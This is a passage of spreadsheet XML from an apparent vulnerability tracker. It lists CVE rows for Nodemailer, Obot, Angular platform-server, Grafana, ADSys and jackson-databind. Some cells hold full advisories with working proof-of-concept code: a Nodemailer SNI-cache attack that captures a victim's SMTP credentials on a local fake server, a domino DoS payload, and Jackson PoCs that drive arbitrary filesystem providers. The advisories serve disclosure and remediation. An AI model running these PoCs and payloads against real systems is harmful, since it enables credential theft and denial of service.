return this._resolveAndConnect(opts, resolved =&gt; {
    this._connectToHost(opts, this.secureConnection);
});
```
```ts
for (const key of Object.keys(resolved!)) {
    if (key.charAt(0) !== '_' &amp;&amp; (resolved as { [key: string]: any })[key]) {
        (opts as { [key: string]: any })[key] = (resolved as { [key: string]: any })[key];
    }
}
```
The resulting `opts` object is passed to `tls.connect()`. Node therefore sends the cached server name as SNI and verifies the certificate against that cached name, rather than against the server name explicitly configured for the current transport.
The default DNS cache TTL is five minutes:
```ts
const DNS_TTL = 5 * 60 * 1000;
```
### Code path
```text
Tenant A: createTransport({ host: H, secure: true,
                            tls: { servername: attackerName } })
  -&gt; SMTPConnection.connect()
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: attackerName })
  -&gt; dnsCache.set(H, { addresses, servername: attackerName })
Victim: createTransport({ host: H, secure: true,
                          tls: { servername: victimName } })
  -&gt; SMTPConnection.connect()
  -&gt; opts.servername = victimName
  -&gt; _resolveAndConnect(opts)
  -&gt; shared.resolveHostname({ host: H, servername: victimName })
  -&gt; dnsCache.get(H)
  -&gt; returns cached servername = attackerName
  -&gt; _resolveAndConnect overwrites opts.servername
  -&gt; tls.connect({ servername: attackerName })
  -&gt; attacker SNI virtual host and certificate are selected
  -&gt; AUTH transmits victim SMTP credentials
```
### Relevant source locations in the tested revision
- `src/shared/index.ts:184` — five-minute default cache TTL
- `src/shared/index.ts:245` — process-global cache keyed by host
- `src/shared/index.ts:247-262` — cached `servername` returned by `formatDNSValue()`
- `src/shared/index.ts:292-323` — host-only lookup and cache-hit return
- `src/shared/index.ts:350-359` — caller-specific `servername` stored in host-only cache
- `src/smtp-connection/index.ts:713-729` — direct TLS options and resolver call
- `src/smtp-connection/index.ts:741-763` — cached fields overwrite current connection options
## PoC
### Prerequisites
- Node.js 20 (tested with Node.js `20.20.2`)
- A checkout/build of Nodemailer `10.0.1`
- OpenSSL to generate the local test certificate
No external SMTP server or network access is required.
### 1. Generate a certificate for only `attacker.test`
Create `openssl.cnf`:
```ini
[req]
distinguished_name = dn
x509_extensions = ext
prompt = no
[dn]
CN = attacker.test
[ext]
subjectAltName = DNS:attacker.test
basicConstraints = critical,CA:TRUE
keyUsage = critical,digitalSignature,keyEncipherment,keyCertSign
extendedKeyUsage = serverAuth
```
Generate the certificate and private key:
```bash
openssl req -x509 -newkey rsa:2048 -nodes -days 1 \
  -keyout attacker-key.pem -out attacker-cert.pem -config openssl.cnf
```
### 2. Save the following as `poc-dns-cache-servername-confusion.mjs`
Adjust the two import paths if the PoC is not saved beside the repository checkout.
```js
import fs from 'node:fs';
import tls from 'node:tls';
import nodemailer from '../../nodemailer/dist/esm/nodemailer.js';
import * as shared from '../../nodemailer/dist/esm/shared/index.js';
const cert = fs.readFileSync(new URL('./tls-fixture/attacker-cert.pem', import.meta.url));
const key = fs.readFileSync(new URL('./tls-fixture/attacker-key.pem', import.meta.url));
const observedSni = [];
const observedAuth = [];
const server = tls.createServer({ key, cert }, socket =&gt; {
    observedSni.push(socket.servername);
    socket.write('220 attacker.test ESMTP\r\n');
    let input = '';
    socket.on('data', chunk =&gt; {
        input += chunk.toString();
        let end;
        while ((end = input.indexOf('\r\n')) &gt;= 0) {
            const line = input.slice(0, end);
            input = input.slice(end + 2);
            if (/^EHLO /i.test(line)) {
                socket.write('250-attacker.test\r\n250 AUTH PLAIN\r\n');
            } else if (/^AUTH /i.test(line)) {
                observedAuth.push(line);
                socket.write('235 2.7.0 Authentication successful\r\n');
            } else if (/^QUIT/i.test(line)) {
                socket.end('221 Bye\r\n');
            } else {
                socket.write('250 OK\r\n');
            }
        }
    });
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
try {
    shared.dnsCache.clear();
    // Tenant A seeds the process-global cache for the shared DNS host.
    const attackerTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'attacker@example.test', pass: 'attacker-secret' },
        tls: {
            ca: cert,
            servername: 'attacker.test',
            rejectUnauthorized: true
        }
    });
    await attackerTransport.verify();
    attackerTransport.close();
    // The victim explicitly configures a different TLS identity.
    const victimTransport = nodemailer.createTransport({
        host: 'localhost',
        port: server.address().port,
        secure: true,
        auth: { user: 'victim@example.test', pass: 'victim-secret' },
        tls: {
            ca: cert,
            servername: 'victim.test',
            rejectUnauthorized: true
        }
    });
    await victimTransport.verify();
    victimTransport.close();
    const decoded = observedAuth.map(line =&gt;
        line.startsWith('AUTH PLAIN ')
            ? Buffer.from(line.slice('AUTH PLAIN '.length), 'base64').toString()
            : null
    );
    console.log(JSON.stringify({
        attackerConfiguredServername: 'attacker.test',
        victimConfiguredServername: 'victim.test',
        serverObservedSniForBothConnections: observedSni,
        serverReceivedCredentials: decoded
    }, null, 2));
} finally {
    shared.dnsCache.clear();
    await new Promise(resolve =&gt; server.close(resolve));
}
```
### 3. Build and run
From the Nodemailer checkout:
```bash
npm install
npm run build
node ../audit/nodemailer/poc-dns-cache-servername-confusion.mjs
```
### Observed result
```json
{
  "attackerConfiguredServername": "attacker.test",
  "victimConfiguredServername": "victim.test",
  "serverObservedSniForBothConnections": [
    "attacker.test",
    "attacker.test"
  ],
  "serverReceivedCredentials": [
    "\\u0000attacker@example.test\\u0000attacker-secret",
    "\\u0000victim@example.test\\u0000victim-secret"
  ]
}
```
The victim configured `victim.test`, but the server observes `attacker.test` for both handshakes. The local certificate contains only `attacker.test`, yet the victim connection succeeds with `rejectUnauthorized: true` and then sends the victim's username and password.
### Expected result
The second connection must use `victim.test` for SNI and certificate hostname verification. With the PoC certificate, it should fail with a hostname mismatch before SMTP authentication occurs. It must never transmit victim credentials after validating the peer as `attacker.test`.
## Impact
The vulnerability affects long-running applications that create multiple Nodemailer transports in one process and let separate tenants or security domains configure transports that share a DNS `host`. A practical example is an email platform whose SMTP gateway uses SNI to route several customer-specific SMTP endpoints behind one hostname.
An attacker who can create or exercise one transport can prime the global cache with the shared host and the attacker's `tls.servername`. During the cache lifetime, a victim's direct SMTPS connection to that host can:
1. send the attacker's server name as SNI;
2. be routed to the attacker's TLS virtual host;
3. validate the attacker's certificate against the stale name, even though strict certificate validation is enabled; and
4. transmit the victim's SMTP username and password to that endpoint.
Possession of SMTP credentials may also let the attacker read or change mail account state where the provider reuses those credentials, or send mail as the victim. The exact secondary impact depends on the SMTP provider.
Where the attacker cannot control an SNI virtual host, stale cross-transport SNI can still cause certificate mismatch failures and cross-tenant availability impact.
### Preconditions and limitations
- Two transports must execute in the same Node.js process within the cache lifetime.
- They must use the same non-IP `host` cache key and different `tls.servername` values.
- Credential interception requires an endpoint or gateway that routes connections using SNI, or another deployment where the attacker controls the endpoint selected by the stale name.
- The demonstrated path uses direct SMTPS (`secure: true`). The STARTTLS upgrade path constructs TLS options separately and is not claimed vulnerable by this report.
## Suggested remediation
The DNS cache should store DNS data only. `servername` is connection-specific TLS policy and should not be persisted in a cache keyed solely by hostname.
One approach is to remove `servername` from `DnsCacheValue` and derive the returned value from the current request on every path:
```ts
return {
    host: selectedAddress,
    servername: options.servername || options.host || false,
    _addresses: addresses,
    cached: true
};
```
As defense in depth, `_resolveAndConnect()` should not overwrite an explicitly configured `opts.servername` with resolver metadata. Keying the cache by both host and server name would avoid this particular collision, but keeping TLS identity out of a DNS-address cache provides a cleaner separation.
A regression test should create two direct-TLS transports in the same process with the same DNS host and different explicit server names, then assert that each TLS connection observes and verifies its own configured name regardless of cache order.</t>
        </is>
      </c>
      <c r="T157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100701</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101062</t>
        </is>
      </c>
      <c r="D158" s="5" t="inlineStr"/>
      <c r="E158" s="5" t="inlineStr"/>
      <c r="F158" s="5" t="inlineStr"/>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr"/>
      <c r="J158" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K158" s="5" t="inlineStr"/>
      <c r="L158" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="M158" s="5" t="inlineStr">
        <is>
          <t>0.23.0</t>
        </is>
      </c>
      <c r="N158" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P158" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q158" s="5" t="inlineStr"/>
      <c r="R158" s="5" t="inlineStr"/>
      <c r="S158" s="5" t="inlineStr">
        <is>
          <t>Obot: OAuth Dynamic Client Registration Enables API Token Theft via Audience Confusion in github.com/obot-platform/obot</t>
        </is>
      </c>
      <c r="T158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101062</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101895</t>
        </is>
      </c>
      <c r="D159" s="5" t="inlineStr"/>
      <c r="E159" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F159" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr"/>
      <c r="J159" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K159" s="5" t="inlineStr"/>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M159" s="5" t="inlineStr">
        <is>
          <t>20.3.31, 21.2.23, 22.1.6</t>
        </is>
      </c>
      <c r="N159" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P159" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q159" s="5" t="inlineStr"/>
      <c r="R159" s="5" t="inlineStr"/>
      <c r="S159" s="5" t="inlineStr">
        <is>
          <t>A Denial of Service (DoS) vulnerability exists in `@angular/platform-server`'s DOM emulation parser (`domino`). When processing untrusted user input containing an incomplete DOCTYPE declaration ending with whitespace before EOF (such as `&lt;!DOCTYPE html `), the HTML parser enters an infinite synchronous loop, pegging CPU utilization at 100% and completely freezing the Node.js server process.
### Technical Description
In Angular Server-Side Rendering (SSR), `@angular/platform-server` uses `domino` to parse and sanitize HTML bound through template bindings (such as `[innerHTML]`) or manipulated via DOM APIs.
In Domino's HTML parser (`lib/HTMLParser.js`), tokenizer states that specify fixed lookahead—such as `after_doctype_name_state` (`lookahead = 6`)—rely on the state handler function to explicitly advance the character index pointer (`nextchar`). While branches for whitespace, `&gt;`, and keyword matching advance `nextchar`, the EOF branch (`case -1: // EOF`) emitted doctype and EOF tokens without advancing `nextchar` or transitioning out of the state:
```javascript
case -1: // EOF
  forcequirks();
  emitDoctype();
  emitEOF();
  break;
```
Because `nextchar` remained unchanged pointing to the EOF marker character (`\uFFFF`), the scanner loop (`while (nextchar &lt; numchars)`) repeatedly re-invoked `after_doctype_name_state` with `codepoint = EOF` indefinitely. In Node.js's single-threaded runtime, this synchronous loop starves the event loop entirely.
### Impact &amp; Reachability
* **Reachability**: The vulnerability is reachable in any Angular SSR application where untrusted user input is bound to `[innerHTML]`, interpolated into markup, or sanitized on the server.
* **Impact**: Successful exploitation allows an unauthenticated remote attacker to cause an immediate Denial of Service (DoS) by sending a payload containing an incomplete DOCTYPE (e.g., `&lt;!DOCTYPE html `). The Node.js SSR process locks up at 100% CPU and ceases responding to all concurrent and subsequent HTTP requests.
**Proof of Concept:**
```ts
import { Component } from '@angular/core';
@Component({
  selector: 'app-root',
  standalone: true,
  template: `&lt;div [innerHTML]="payload"&gt;&lt;/div&gt;`,
})
export class AppComponent {
  // Attacker-controlled input containing an incomplete DOCTYPE ending with whitespace
  payload = '&lt;!DOCTYPE html ';
}
```
### Workarounds
* Avoid binding untrusted user input directly to `[innerHTML]` in server-rendered templates; use standard text interpolation (`{{ userInput }}`) or `[textContent]` when raw HTML rendering is not required.
* Validate or sanitize user input before passing it to `[innerHTML]` on the server by stripping or rejecting strings matching `/^&lt;!DOCTYPE/i`.</t>
        </is>
      </c>
      <c r="T159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101895</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10601</t>
        </is>
      </c>
      <c r="D160" s="5" t="inlineStr"/>
      <c r="E160" s="5" t="inlineStr"/>
      <c r="F160" s="5" t="inlineStr"/>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr"/>
      <c r="J160" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K160" s="5" t="inlineStr"/>
      <c r="L160" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/grafana/grafana</t>
        </is>
      </c>
      <c r="M160" s="5" t="inlineStr"/>
      <c r="N160" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O160" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P160" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q160" s="5" t="inlineStr"/>
      <c r="R160" s="5" t="inlineStr"/>
      <c r="S160" s="5" t="inlineStr">
        <is>
          <t>Grafana: Path traversal in the Tempo and Loki data source plugins in github.com/grafana/grafana.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github.com/grafana/grafana before v1.9.2-0.20260616075434-82ef13993059.</t>
        </is>
      </c>
      <c r="T160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10601</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12249</t>
        </is>
      </c>
      <c r="D161" s="5" t="inlineStr"/>
      <c r="E161" s="5" t="inlineStr"/>
      <c r="F161" s="5" t="inlineStr"/>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr"/>
      <c r="J161" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K161" s="5" t="inlineStr"/>
      <c r="L161" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/ubuntu/adsys</t>
        </is>
      </c>
      <c r="M161" s="5" t="inlineStr"/>
      <c r="N161" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O161" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P161" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q161" s="5" t="inlineStr"/>
      <c r="R161" s="5" t="inlineStr"/>
      <c r="S161" s="5" t="inlineStr">
        <is>
          <t>Canonical ADSys Uses a Less Trusted Source in github.com/ubuntu/adsys.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github.com/ubuntu/adsys before v0.16.3-0.20250318112551-8b1939f96d38.</t>
        </is>
      </c>
      <c r="T161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12249</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19032</t>
        </is>
      </c>
      <c r="D162" s="5" t="inlineStr"/>
      <c r="E162" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F162" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr"/>
      <c r="J162" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K162" s="5" t="inlineStr"/>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M162" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N162" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P162" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q162" s="5" t="inlineStr"/>
      <c r="R162" s="5" t="inlineStr"/>
      <c r="S162" s="5" t="inlineStr">
        <is>
          <t>### Summary
A `java.nio.file.Path` field bound from untrusted JSON reaches `JDKFromStringDeserializer.NioPathHelper.deserialize`. The attacker string flows through `new URI(value)` → `Path.of(uri)`, then on `FileSystemNotFoundException` into a `ServiceLoader&lt;FileSystemProvider&gt;` enumeration that calls `provider.getPath(uri)` on the first scheme-matching provider. No scheme is rejected, so untrusted JSON can drive an arbitrary registered provider under the default `JsonMapper.builder().build()`.
Impact is bounded. The JDK built-in providers (`file`, `jar`/zipfs) do no network I/O and do not mount, so the path is inert without a side-effecting third-party provider. Binding `Path` from untrusted input is already an anti-pattern.
### Description
`NioPathHelper.deserialize` performs provider resolution driven by the attacker URI (abridged; the real method also handles a Windows drive-letter prefix and wraps failures via `ctxt.handleInstantiationProblem(...)`):
```java
int colonIx = value.indexOf(':');
if (colonIx &lt; 0) { return Path.of(value); }
...
final URI uri = new URI(value);          // attacker-controlled URI string
try {
    return Path.of(uri);                  // resolves scheme -&gt; may load a FileSystemProvider
} catch (FileSystemNotFoundException cause) {
    final String scheme = uri.getScheme();
    for (FileSystemProvider provider : ServiceLoader.load(FileSystemProvider.class)) {
        if (provider.getScheme().equalsIgnoreCase(scheme)) {
            return provider.getPath(uri);  // attacker scheme selects &amp; drives a provider
        }
    }
    // no matching provider -&gt; ctxt.handleInstantiationProblem(...) (throws by default)
}
```
The attacker's scheme selects the provider and the attacker's URI is passed to it; the enumeration also forces provider classloading during `readValue`. For built-in schemes like `jar:`, `getPath` throws `FileSystemNotFoundException` (a mount requires explicit `newFileSystem`), surfacing as a wrapped `ValueInstantiationException` with no terminal effect. Any mount, network I/O, or resource access depends entirely on the selected provider.
## Vulnerable Code Location
- `src/main/java/tools/jackson/databind/deser/jdk/JDKFromStringDeserializer.java`
  - `STD_PATH` → `NioPathHelper.deserialize`; `NioPathHelper.deserialize` body 
       (`new URI` → `Path.of(uri)` → `ServiceLoader.load(FileSystemProvider.class)` → `provider.getPath(uri)`).
## Proof of Concept
Two PoCs are provided. 
&gt; PoC 2 registers a custom `FileSystemProvider` to show that attacker JSON reaches `provider.getPath(attackerURI)` inside `readValue`. Whether a third-party provider then does anything harmful is outside the library's control. The in-scope issue is **PoC 1** — the `jar:`/arbitrary-scheme path reaching the `ServiceLoader` fallback with no scheme restriction.
**PoC 1 — sink reached (built-in `jar` provider).** 
`com/poc/Vuln04_PathProvider.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
import java.nio.file.Path;
/**
 * Vuln 4: java.nio.file.Path deserialization resolves an attacker URI via
 * Path.of(uri) / ServiceLoader&lt;FileSystemProvider&gt;.
 */
public class Vuln04_PathProvider {
    public static class Config { public Path workdir; }
    public static void main(String[] args) throws Exception {
        ObjectMapper mapper = JsonMapper.builder().build();
        // jar: scheme forces FileSystemProvider resolution / mounting attempt on attacker URI.
        String json = "{\"workdir\":\"jar:file:/tmp/jackson_poc_evil.zip!/x\"}";
        System.out.println("Deserializing (default mapper): " + json);
        try {
            Config c = mapper.readValue(json, Config.class);
            System.out.println("Resolved Path = " + c.workdir + "  (class=" + (c.workdir==null?"null":c.workdir.getClass().getName()) + ")");
            System.out.println("RESULT: VULNERABLE - attacker URI scheme resolved through provider machinery during readValue");
        } catch (Throwable t) {
            System.out.println("Throwable during resolution: " + t.getClass().getName() + ": " + t.getMessage());
            System.out.println("RESULT: VULNERABLE (attacker URI drove provider resolution; threw " + t.getClass().getSimpleName() + " inside readValue)");
        }
    }
}
```
**PoC 2 — scheme-selection mechanism demo (custom `FileSystemProvider`).**
A third-party provider (scheme `evilscheme`) registered via `META-INF/services/java.nio.file.spi.FileSystemProvider`, which is standing in for *any* provider a real application ships. 
`com/poc/EvilFileSystemProvider.java`:
```java
package com.poc;
import java.nio.file.*;
import java.nio.file.spi.FileSystemProvider;
import java.nio.file.attribute.*;
import java.net.URI;
import java.io.IOException;
import java.util.*;
import java.util.Set;
import java.nio.channels.SeekableByteChannel;
/**
 * A custom java.nio.file.spi.FileSystemProvider registered via META-INF/services, using the
 * scheme "evilscheme". It stands in for ANY third-party FileSystemProvider present on a real
 * application's classpath. Its static initializer and getPath() record that they executed,
 * proving that attacker-controlled JSON drove provider class loading + provider.getPath(uri)
 * inside jackson's readValue.
 */
public class EvilFileSystemProvider extends FileSystemProvider {
    public static volatile boolean STATIC_INIT_RAN = false;
    public static volatile String GET_PATH_URI = null;
    static { STATIC_INIT_RAN = true; }
    @Override public String getScheme() { return "evilscheme"; }
    @Override public Path getPath(URI uri) {
        GET_PATH_URI = uri.toString();
        System.out.println("&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: " + uri);
        // A malicious/vulnerable provider could here open a socket, read a file, mount a FS, etc.
        return java.nio.file.Path.of(System.getProperty("java.io.tmpdir"), "evilprovider-marker");
    }
    // --- remaining abstract methods: minimal stubs ---
    @Override public FileSystem newFileSystem(URI uri, Map&lt;String,?&gt; env) { throw new UnsupportedOperationException(); }
    @Override public FileSystem getFileSystem(URI uri) { throw new FileSystemNotFoundException(); }
    @Override public SeekableByteChannel newByteChannel(Path p, Set&lt;? extends OpenOption&gt; o, FileAttribute&lt;?&gt;... a) throws IOException { throw new UnsupportedOperationException(); }
    @Override public DirectoryStream&lt;Path&gt; newDirectoryStream(Path d, DirectoryStream.Filter&lt;? super Path&gt; f) { throw new UnsupportedOperationException(); }
    @Override public void createDirectory(Path d, FileAttribute&lt;?&gt;... a) { throw new UnsupportedOperationException(); }
    @Override public void delete(Path p) { throw new UnsupportedOperationException(); }
    @Override public void copy(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public void move(Path s, Path t, CopyOption... o) { throw new UnsupportedOperationException(); }
    @Override public boolean isSameFile(Path p, Path p2) { return false; }
    @Override public boolean isHidden(Path p) { return false; }
    @Override public FileStore getFileStore(Path p) { throw new UnsupportedOperationException(); }
    @Override public void checkAccess(Path p, AccessMode... m) { }
    @Override public &lt;V extends FileAttributeView&gt; V getFileAttributeView(Path p, Class&lt;V&gt; t, LinkOption... o) { return null; }
    @Override public &lt;A extends BasicFileAttributes&gt; A readAttributes(Path p, Class&lt;A&gt; t, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public Map&lt;String,Object&gt; readAttributes(Path p, String a, LinkOption... o) { throw new UnsupportedOperationException(); }
    @Override public void setAttribute(Path p, String a, Object v, LinkOption... o) { }
}
```
Registration descriptor —
`src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider`:
```
com.poc.EvilFileSystemProvider
```
Driver — `com/poc/Vuln04b_PathProviderMount.java`:
```java
package com.poc;
import tools.jackson.databind.ObjectMapper;
import tools.jackson.databind.json.JsonMapper;
/**
 * Vuln 4 (end-to-end terminal effect): a third-party FileSystemProvider registered via
 * META-INF/services (scheme "evilscheme") stands in for any provider on a real app's
 * classpath. Attacker JSON with that scheme drives jackson's ServiceLoader fallback to
 * (1) load the provider class (running its static initializer) and (2) invoke
 * provider.getPath(attackerUri) -- all inside readValue, with NO application code.
 */
public class Vuln04b_PathProviderMount {
    public static class Config { public java.nio.file.Path workdir; }
    public static void main(String[] args) throws Exception {
        System.out.println("Provider static-init ran before deserialization? " + EvilFileSystemProvider.STATIC_INIT_RAN);
        ObjectMapper mapper = JsonMapper.builder().build();   // default config
        String json = "{\"workdir\":\"evilscheme://attacker-controlled/target?x=1\"}";
        System.out.println("Deserializing (default mapper): " + json);
        Config c = mapper.readValue(json, Config.class);
        System.out.println("Resolved Path = " + c.workdir);
        System.out.println("Provider static-init ran: " + EvilFileSystemProvider.STATIC_INIT_RAN);
        System.out.println("Provider.getPath() attacker URI: " + EvilFileSystemProvider.GET_PATH_URI);
        boolean ok = EvilFileSystemProvider.GET_PATH_URI != null
                &amp;&amp; EvilFileSystemProvider.GET_PATH_URI.contains("attacker-controlled");
        System.out.println(ok
            ? "RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)"
            : "RESULT: NOT reproduced");
    }
}
```
## Execution Steps
The PoCs need only the three Jackson 3.2.1 jars on the classpath and can be built with plain `javac`/`java` . PoC 2 additionally requires the `META-INF/services` descriptor to be on the **runtime** classpath
```bash
# 0. Locate the three published dependency jars.
M2="$HOME/.m2/repository"
DB="$M2/tools/jackson/core/jackson-databind/3.2.1/jackson-databind-3.2.1.jar"
CORE="$M2/tools/jackson/core/jackson-core/3.2.1/jackson-core-3.2.1.jar"
ANN="$M2/com/fasterxml/jackson/core/jackson-annotations/2.22/jackson-annotations-2.22.jar"
CP="$DB:$CORE:$ANN"
# 1. Compile the three sources.
cd poc-project
mkdir -p out
javac -cp "$CP" -d out \
  src/main/java/com/poc/EvilFileSystemProvider.java \
  src/main/java/com/poc/Vuln04_PathProvider.java \
  src/main/java/com/poc/Vuln04b_PathProviderMount.java
# 2. Put the ServiceLoader descriptor on the runtime classpath (needed by PoC 2).
mkdir -p out/META-INF/services
cp src/main/resources/META-INF/services/java.nio.file.spi.FileSystemProvider \
   out/META-INF/services/java.nio.file.spi.FileSystemProvider
# 3. Run both PoCs.
java -cp "out:$CP" com.poc.Vuln04_PathProvider        # PoC 1
java -cp "out:$CP" com.poc.Vuln04b_PathProviderMount  # PoC 2
```
## Reproduction Evidence
Executed against jackson-databind 3.2.1 (OpenJDK 25).
**PoC 1 :**
```
Deserializing (default mapper): {"workdir":"jar:file:/tmp/jackson_poc_evil.zip!/x"}
Throwable during resolution: tools.jackson.databind.exc.ValueInstantiationException: Cannot construct instance of `java.nio.file.Path`, problem: `java.nio.file.FileSystemNotFoundException`
 at [Source: REDACTED (`StreamReadFeature.INCLUDE_SOURCE_IN_LOCATION` disabled); byte offset: #UNKNOWN] (through reference chain: com.poc.Vuln04_PathProvider$Config["workdir"])
RESULT: VULNERABLE (attacker URI drove provider resolution; threw ValueInstantiationException inside readValue)
```
Notes: the JDK **built-in** `jar` provider's `getPath` does not auto-mount (it also throws `FileSystemNotFoundException`, since only `newFileSystem` mounts). PoC 1 proves the in-scope defect: attacker input reaches the scheme-driven `ServiceLoader` resolution during `readValue` with no allow-list. PoC 2 only illustrates the downstream mechanism.
**PoC 2  :**
```
Provider static-init ran before deserialization? true
Deserializing (default mapper): {"workdir":"evilscheme://attacker-controlled/target?x=1"}
&gt;&gt;&gt; [EVIL-PROVIDER] getPath() invoked with attacker URI: evilscheme://attacker-controlled/target?x=1
Resolved Path = /var/folders/.../T/evilprovider-marker
Provider static-init ran: true
Provider.getPath() attacker URI: evilscheme://attacker-controlled/target?x=1
RESULT: VULNERABLE - attacker JSON drove ServiceLoader provider load + provider.getPath(attackerUri) inside readValue (terminal effect proven)
```
Purely from a JSON string, jackson's `ServiceLoader` fallback selected the attacker-named scheme's provider and invoked `provider.getPath(uri)` with the full attacker URI inside `readValue`. Whether a given provider then does anything harmful is outside the library's control; the in-scope issue is the absence of a scheme restriction before this fallback runs.
## Impact
Untrusted JSON drives `provider.getPath(attackerURI)` on an attacker-chosen provider during `readValue`. With only the JDK built-in providers this is inert. Real impact requires a side-effecting third-party provider on the classpath. The fix is to close the
scheme-restriction gap.
## Recommended Fix
1. **Restrict the resolved scheme to a fixed, hard-coded set** ; reject `jar:` and other schemes via `ctxt.handleWeirdStringValue(...)`. A hard-coded set keeps the fix backport-safe with no new configuration surface.
2. **Skip the `ServiceLoader&lt;FileSystemProvider&gt;` enumeration for disallowed schemes**, so untrusted JSON cannot select and drive an arbitrary registered provider.
3. Document that `java.nio.file.Path`-typed fields should not be bound from untrusted JSON.</t>
        </is>
      </c>
